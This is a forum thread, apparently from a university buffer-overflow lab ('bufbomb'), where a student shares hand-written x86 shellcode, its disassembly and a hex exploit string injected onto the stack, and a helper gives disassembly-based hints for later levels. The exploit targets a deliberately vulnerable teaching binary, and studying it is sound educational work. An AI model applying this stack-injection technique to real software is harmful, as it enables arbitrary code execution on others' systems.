The idea for the solution was that
in the exploit code: set the cookie to the global_val and set return address to bang
then I need to set the return to the beginning of the exploit code which is 00 00 00 00 as you see <.text>
But I dont know what to put in the middle of that (char 17 18 19 20) or if we have too. If I dont put it give me error: illegal instruction
If I put I get seg. fault
Thanks
Sorry for the long reply
Within the ï¬le bufbomb there is a function bang having the following C code:
int global_value = 0;
void bang(int val)
{
entry_check(2); /* Make sure entered this function properly */
if (global_value == cookie) {
printf("Bang!: You set global_value to 0x%x\n", global_value);
validate(2);
} else
printf("Misfire: global_value = 0x%x\n", global_value);
exit(0);
}
Similar to Levels 0 and 1, your task is to get BUFB OMB to execute the code for bang rather than returning
to test. Before this, however, you must set global variable global_value to your team’s cookie. Your
exploit code should set global_value, push the address of bang on the stack, and then execute a ret
instruction to cause a jump to the code for bang.
my code to manipulate the buffer is
movl 0x62f898e1,%eax
movl %eax,0x0804a1c0
push $0x08048ca0
ret
then it convert to the byte code
00000000 <.text>:
0: a1 e1 98 f8 62 mov 0x62f898e1,%eax
5: a3 c0 a1 04 08 mov %eax,0x804a1c0
a: 68 a0 8c 04 08 push $0x8048ca0
f: c3 ret
-bash-3.1$
then my solution is
b8 e1 98 f8 62 a3 c0 a1 04 08 68 a0 8c 04 08 c3 00 00 00 00 d8 b1 ff bf
which then I convert to ascii
However I keep getting the segmentation fault.
The idea for the solution was that
in the exploit code: set the cookie to the global_val and set return address to bang
then I need to set the return to the beginning of the exploit code which is 00 00 00 00 as you see <.text>
But I dont know what to put in the middle of that (char 17 18 19 20) or if we have too. If I dont put it give me error: illegal instruction
If I put I get seg. fault
Thanks
Sorry for the long reply
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Where did you get this value?
mov 0x62f898e1
for number 3. Infinity if you are there please help!
mov 0x62f898e1
for number 3. Infinity if you are there please help!
I'm here, and I'll take a look at your other question in a short while ;)
Thanks!!! You're a life saver. I've made some progress since i posted. I'll put it up on my other question.
I am confused for level 1.. for my bufbomb code I had 40 bytes for level 0. all 0's then the address of smoke. For level 1 i have to make my cookie a parameter. What I have done is put all 0s, then my cookie, then the address of fizz but it's not getting validated. I'm confused
tusmooth4unat : please open your own question (you can click the "Ask a Related Question" button for that), so you can get specific assistance for yourself.
I have however had a look over the assignment, and here's how I would get started. At first sight, it seems like the test function is the center piece. There's a few weird things happening there, like :
1)
8048f36: c7 45 fc ef be ad de movl $0xdeadbeef,0xfffffffc(%eb
0xdeadbeef is a strange value, so check that out.
2) it seems like entry_check keeps track of the current state :
3 : start
2 : smoke
1 : fizz
0 : bang
3) this :
8048f49: e8 c2 ff ff ff call 8048f10 <getbuf>
8048f4e: 89 c2 mov %eax,%edx
8048f50: 8b 45 fc mov 0xfffffffc(%ebp),%eax
8048f53: 3d ef be ad de cmp $0xdeadbeef,%eax
means you somehow want to make getbuf put 0xdeadbeef is 0xfffffffc(%ebp). So, choose your input right
4) and :
8048f68: 3b 15 b0 a1 04 08 cmp 0x804a1b0,%edx
you want the return value of getbuf to be 0x804a1b0 so you can get to this call :
8048f99: e8 92 fa ff ff call 8048a30 <validate>
that looks important.
I hope this helps you further. As I said - I only had a quick look.